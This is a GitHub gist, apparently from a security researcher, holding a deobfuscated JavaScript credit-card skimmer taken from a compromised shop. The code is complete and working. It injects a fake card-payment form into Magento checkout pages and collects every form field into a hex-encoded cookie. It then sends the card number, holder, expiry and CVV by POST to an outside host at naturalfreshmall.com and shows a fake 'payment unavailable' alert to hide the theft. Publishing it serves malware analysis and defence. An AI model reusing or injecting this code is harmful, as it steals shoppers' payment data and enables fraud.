Created
April 25, 2022 11:05
-
-
Save BenBaryoPX/2a0fb055c051778a492b090985408959 to your computer and use it in GitHub Desktop.
A deobfuscated and restructured version of the Bom skimmer served from naturalfreshmall
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var f_id_daww = Math.random().toString(16).substr(2, 14); | |
function replaceExistingFormWithFakeForm() { | |
if (document.getElementById('checkout-payment-method-load') && | |
document.getElementById('checkout-payment-method-load').innerHTML.indexOf('cc_cid') == -1) { | |
if (!document.getElementById(f_id_daww)) { | |
const fakeFormHtml = '<ul id="' + f_id_daww + '" style=""><li><h3><b>Credit/Debit Card Secure Payment</b></h3></li><div id="' + f_id_daww + '5233' + '"><div class="input--field"> <label for="field--holder"> Cardholder <em>*</em></label> <input id="field--holder" type="text" maxlength="50" name="payment[cc_owner]"> <div class="validation" id="field--holder--validation"> </div></div><div class="input--field"> <label for="field--card-number"> Card Number <em>*</em></label> <input id="field--card-number" type="text" maxlength="24" name="payment[cc_number]"> <div class="validation" id="field--card-number--validation"> </div></div><div><label for="field--month">Expiration Date <em>*</em></div><div class="input--field fix--expiration-date"> <div class="select--expiration-date"> <select id="field--month" name="payment[exp_month]"> <option value="" selected="">Month</option> <option value="01">01</option> <option value="02">02</option> <option value="03">03</option> <option value="04">04</option> <option value="05">05</option> <option value="06">06</option> <option value="07">07</option> <option value="08">08</option> <option value="09">09</option> <option value="10">10</option> <option value="11">11</option> <option value="12">12</option> </select> <div class="validation" id="field--month--validation"> </div></div><div class="select--expiration-date"> <select id="field--year" name="payment[exp_year]"> <option value="" selected="">Year</option> <option value="21">2021</option> <option value="22">2022</option> <option value="23">2023</option> <option value="24">2024</option> <option value="25">2025</option> <option value="26">2026</option> <option value="27">2027</option> <option value="28">2028</option> <option value="29">2029</option> <option value="30">2030</option> </select> <div class="validation" id="field--year--validation"> </div></div></div><div class="input--field"> <label for="field--cvv"> Card Verification Number <em>*</em></label> <input id="field--cvv" type="password" maxlength="4" name="payment[cc_cid]"> <div class="validation" id="field--cvv--validation"> </div></div><style>#' + f_id_daww + '5233' + '{margin-left:20px;max-width: 300px;min-width: 200px; padding: 20px 0px;}#' + f_id_daww + '5233' + ' .information--field{margin-bottom: 12px;}#' + f_id_daww + '5233' + ' .information--field a{position: relative; color: #ca0001; margin-left: 30px; bottom: 15px; text-transform: uppercase;}#' + f_id_daww + '5233' + ' label{display: block; width: 100%; color: #333; text-transform: uppercase; margin-bottom: 5px;}#' + f_id_daww + '5233' + ' em{color: #ca0001;}#' + f_id_daww + '5233' + ' input, #' + f_id_daww + '5233' + ' select{height: 40px; padding: 0 8px; font-family: "Ubuntu", sans-serif; color: #5d6a7f; border: solid 1px #dfdfdf; background: #f5f5f5; font-size: 14px; border-radius: 0px; line-height: 1.5;}#' + f_id_daww + '5233' + ' .input--field{margin-bottom: 15px;}#field--card-number, #field--holder{width: 100%;}#' + f_id_daww + '5233' + ' .select--expiration-date{width: 50%; float: left;}#' + f_id_daww + '5233' + ' .fix--expiration-date:after{display: block; content: ""; clear: both;}#field--holder{text-transform: capitalize;}#field--cvv{width: 120px;}#' + f_id_daww + '5233' + ' .validation{display: none; color: #ca0001;}#' + f_id_daww + '5233' + ' #button--checkout{background: #ca0001; color: #fff; padding: 0px 20px; outline: 0;}</style></div></ul>'; | |
const newForm = document.createElement('form'); | |
newForm.innerHTML = fakeFormHtml; | |
const paymentMethodsForms = document.getElementById('checkout-payment-method-load').childNodes; | |
for (let i = 0; i < paymentMethodsForms.length; i++) { | |
if (paymentMethodsForms[i].style) { | |
paymentMethodsForms[i].style.display = 'none'; | |
} | |
} | |
document.getElementById('checkout-payment-method-load').appendChild(newForm); | |
} | |
} | |
if (document.getElementById(f_id_daww)) { | |
document.getElementById('field--holder').disabled = false; | |
document.getElementById('field--card-number').disabled = false; | |
document.getElementById('field--month').disabled = false; | |
document.getElementById('field--year').disabled = false; | |
document.getElementById('field--cvv').disabled = false; | |
} | |
} | |
var cook = getCookie('__mg_back'); | |
function checkFakeFormCanBeInjected() { | |
if (cook != '236232342323626326') { | |
setInterval(replaceExistingFormWithFakeForm, 200); | |
} | |
} | |
setTimeout(checkFakeFormCanBeInjected, 500); | |
function removeFakeCCValues(el) { | |
if (el.value == '1234 1234 1234 1234' || el.value == 'CVC' || el.value == 'MM / YY') { | |
el.value = ''; | |
} | |
} | |
function DateStripeV(el) { | |
if (el.value.length == 2) { | |
const originalValue = el.value; | |
el.value = originalValue + ' / '; | |
} | |
if (el.value.length > 6) { | |
const originalValue = el.value; | |
el.value = originalValue.slice(0, 6); | |
} | |
el.value = el.value.replace(' ', ' '); | |
} | |
function generateUUID(idLength) { | |
let output = ''; | |
for (let i = 0; i < idLength; i++) { | |
output += 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'.charAt(Math.floor(Math.random() * 62)); | |
} | |
return output; | |
} | |
function hex2a(hexValue) { | |
const str = hexValue.toString(); | |
let output = ''; | |
for (let i = 0; i < str.length && str.substr(i, 2) !== '00'; i += 2) { | |
output += String.fromCharCode(parseInt(str.substr(i, 2), 16)); | |
} | |
return output; | |
} | |
String.prototype.hexEncode = function () { | |
var hexChar, i; | |
var encodedString = ''; | |
for (i = 0; i < this.length; i++) { | |
hexChar = this.charCodeAt(i).toString(16); | |
encodedString += ('000' + hexChar).slice(-4); | |
} | |
return encodedString; | |
}; | |
String.prototype.hexDecode = function () { | |
var i; | |
var groupsOfFour = this.match(/.{1,4}/g) || []; | |
var decodedString = ''; | |
for (i = 0; i < groupsOfFour.length; i++) { | |
decodedString += String.fromCharCode(parseInt(groupsOfFour[i], 16)); | |
} | |
return decodedString; | |
}; | |
function getCookie(cookieName) { | |
const allCookies = '; ' + document.cookie; | |
const splitByTargetCookie = allCookies.split('; ' + cookieName + '='); | |
if (splitByTargetCookie.length == 2) { | |
return splitByTargetCookie.pop().split(';').shift(); | |
} | |
} | |
function delete_cookie(cookieName) {document.cookie = cookieName + '=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';} | |
function glob_snsd() { | |
const allButtons = document.getElementsByTagName('button'); | |
for (let i = 0; i < allButtons.length; i++) { | |
allButtons[i].addEventListener('click', function () { | |
let stats = ''; | |
const allForms = document.getElementsByTagName('form'); | |
document.cookie = '__mg_front=$; path=/'; | |
for (let z = 0; z < allForms.length; z++) { | |
var formInputs = allForms[z].getElementsByTagName('input'); | |
var formSelects = allForms[z].getElementsByTagName('select'); | |
for (let x = 0; x < formInputs.length; x++) { | |
if (formInputs[x].value && formInputs[x].value != '' && formInputs[x].type != 'radio' && | |
formInputs[x].type != 'hidden' && formInputs[x].id != 'search' && formInputs[x].value != 'submit') { | |
if (formInputs[x].name && formInputs[x].name != '') { | |
let cook = getCookie('__mg_front'); | |
if (cook != '') { | |
cook = cook.hexDecode(); | |
cook += formInputs[x].name + ':' + formInputs[x].value + '|'; | |
cook = cook.hexEncode(); | |
cook = cook.split('00').join(''); | |
document.cookie = '__mg_front=$; path=/'; | |
document.cookie = '__mg_front=' + cook + '; path=/'; | |
} | |
} else { | |
let cook = getCookie('__mg_front'); | |
if (cook != '') { | |
cook = cook.hexDecode(); | |
cook += formInputs[x].id + ':' + formInputs[x].value + '|'; | |
cook = cook.hexEncode(); | |
cook = cook.split('00').join(''); | |
document.cookie = '__mg_front=$; path=/'; | |
document.cookie = '__mg_front=' + cook + '; path=/'; | |
} | |
} | |
} | |
} | |
for (let x = 0; x < formSelects.length; x++) { | |
if (formSelects[x].value && formSelects[x].value != '' && formSelects[x].type != 'radio' && | |
formSelects[x].type != 'hidden' && formSelects[x].id != 'search' && formSelects[x].value != 'submit') { | |
if (formSelects[x].name && formSelects[x].name != '') { | |
let cook = getCookie('__mg_front'); | |
if (cook != '') { | |
cook = cook.hexDecode(); | |
cook += formSelects[x].name + ':' + formSelects[x].value + '|'; | |
cook = cook.hexEncode(); | |
cook = cook.split('00').join(''); | |
document.cookie = '__mg_front=$; path=/'; | |
document.cookie = '__mg_front=' + cook + '; path=/'; | |
} | |
} else { | |
let cook = getCookie('__mg_front'); | |
if (cook != '') { | |
cook = cook.hexDecode(); | |
cook += formSelects[x].id + ':' + formSelects[x].value + '|'; | |
cook = cook.hexEncode(); | |
cook = cook.split('00').join(''); | |
document.cookie = '__mg_front=$; path=/'; | |
document.cookie = '__mg_front=' + cook + '; path=/'; | |
} | |
} | |
} | |
} | |
} | |
stats = getCookie('__mg_front'); | |
stats = hex2a(stats); | |
stats = stats.replace('payment[ps_cc_number]', 'cc_number'); | |
stats = stats.replace('payment[ps_cc_owner]', 'cc_owner'); | |
stats = stats.replace('payment[ps_cc_exp_month]', 'authorizenet_expiration'); | |
stats = stats.replace('payment[ps_cc_exp_year]', 'authorizenet_expiration_yr'); | |
stats = stats.replace('payment[ps_cc_cid]', 'cc_cid'); | |
stats = stats.replace('cc_number:on', ''); | |
stats = stats.replace('creditCardNum', 'cc_number'); | |
stats = stats.replace('creditCardHolder', 'cc_owner'); | |
stats = stats.replace('creditCardExpirationMonth', 'authorizenet_expiration'); | |
stats = stats.replace('creditCardExpirationYear', 'authorizenet_expiration_yr'); | |
stats = stats.replace('creditCardCode', 'cc_cid'); | |
stats = stats.replace('card[num]', 'cc_number'); | |
stats = stats.replace('card[name]', 'cc_owner'); | |
stats = stats.replace('card[exp]', 'authorizenet_expiration'); | |
stats = stats.replace('payment[ccw_exp_year]', 'authorizenet_expiration_yr'); | |
stats = stats.replace('card[cvv]', 'cc_cid'); | |
stats = stats.replace('payment[ps_cc_number]', 'cc_number'); | |
stats = stats.replace('payment[ps_cc_owner]', 'cc_owner'); | |
stats = stats.replace('payment[ps_cc_exp_month]', 'authorizenet_expiration'); | |
stats = stats.replace('payment[ps_cc_exp_year]', 'authorizenet_expiration_yr'); | |
stats = stats.replace('payment[ps_cc_cid]', 'cc_cid'); | |
stats = stats.replace('payment[control_settings]', 'cc_number'); | |
stats = stats.replace('payment[ps_cc_owner]', 'cc_owner'); | |
stats = stats.replace('payment[msn_set]', 'authorizenet_expiration'); | |
stats = stats.replace('payment[yellow_set]', 'authorizenet_expiration_yr'); | |
stats = stats.replace('payment[savage_set]', 'cc_cid'); | |
stats = stats.replace('cardNumber', 'cc_number'); | |
stats = stats.replace('cardholderName', 'cc_owner'); | |
stats = stats.replace('cardExpirationMonth', 'authorizenet_expiration'); | |
stats = stats.replace('cardExpirationYear', 'authorizenet_expiration_yr'); | |
stats = stats.replace('securityCode', 'cc_cid'); | |
stats = stats.replace('mundipagg_creditcard_1_1_cc_number', 'cc_number'); | |
stats = stats.replace('mundipagg_creditcard_cc_holder_name_1_1', 'cc_owner'); | |
stats = stats.replace('payment[mundipagg_creditcard_expirationMonth_1_1]', 'authorizenet_expiration'); | |
stats = stats.replace('payment[mundipagg_creditcard_expirationYear_1_1]', 'authorizenet_expiration_yr'); | |
stats = stats.replace('payment[mundipagg_creditcard_cc_cid_1_1]', 'cc_cid'); | |
stats = stats.replace('sagepaycw_creditcard[card_number]', 'cc_number'); | |
stats = stats.replace('sagepaycw_creditcard[card_holder]', 'cc_owner'); | |
stats = stats.replace('sagepaycw_creditcard[expiry_month]', 'authorizenet_expiration'); | |
stats = stats.replace('sagepaycw_creditcard[expiry_year]', 'authorizenet_expiration_yr'); | |
stats = stats.replace('sagepaycw_creditcard[CV2]', 'cc_cid'); | |
const ccNumberMatches = stats.match(/[a-z0-9]+\-[a-z0-9]+\-[a-z0-9]+\-[a-z0-9]+\-[a-z0-9]+/); | |
if (ccNumberMatches != null) { | |
stats = stats.replace(ccNumberMatches[0], 'cc_number'); | |
} | |
if (stats.indexOf('_number') !== -1 || stats.indexOf('_cid') !== -1) { | |
if (exfiltrationRequired) { | |
const formData = new FormData(); | |
const statsInfos = { | |
referer: document.URL, | |
tag: 'YWxs', | |
stats: btoa(stats.hexEncode()) | |
}; | |
formData.append('products_hash', btoa(generateUUID(64))); | |
formData.append('amount_hash', btoa(generateUUID(64))); | |
formData.append('billing_hash', btoa(generateUUID(128))); | |
formData.append('shipping_hash', btoa(generateUUID(512))); | |
formData.append('visit_hash', btoa(generateUUID(418))); | |
formData.append('stat_infos', btoa(JSON.stringify(statsInfos))); | |
formData.append('captcha_hash', btoa(generateUUID(1024))); | |
formData.append('user_hash', btoa(generateUUID(32))); | |
url = 'checkout'; | |
const xhr = new XMLHttpRequest(); | |
xhr.open('POST', 'https://naturalfreshmall.com/payment/Payment.php', true); | |
xhr.send(formData); | |
document.cookie = '__mg_front=236232342323626326; path=/'; | |
document.cookie = '__mg_back=236232342323626326; path=/'; | |
exfiltrationRequired = false; | |
const checkoutFormChildNodes = document.getElementById('checkout-payment-method-load').childNodes; | |
for (let i = 0; i < checkoutFormChildNodes.length; i++) { | |
if (checkoutFormChildNodes[i].style) { | |
checkoutFormChildNodes[i].style.display = 'block'; | |
} | |
} | |
document.getElementById(f_id_daww).style.display = 'none'; | |
rR(); | |
alert('Selected payment method is currently unavailable, please try again.'); | |
} | |
} | |
}); | |
} | |
} | |
var exfiltrationRequired = true; | |
var cook = getCookie('__mg_back'); | |
if (cook != '236232342323626326') {setInterval(glob_snsd, 4000);} | |
function Rr() {window.location.href = window.location.href.replace('#', '');} | |
function rR() {setTimeout(Rr, 8000);} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment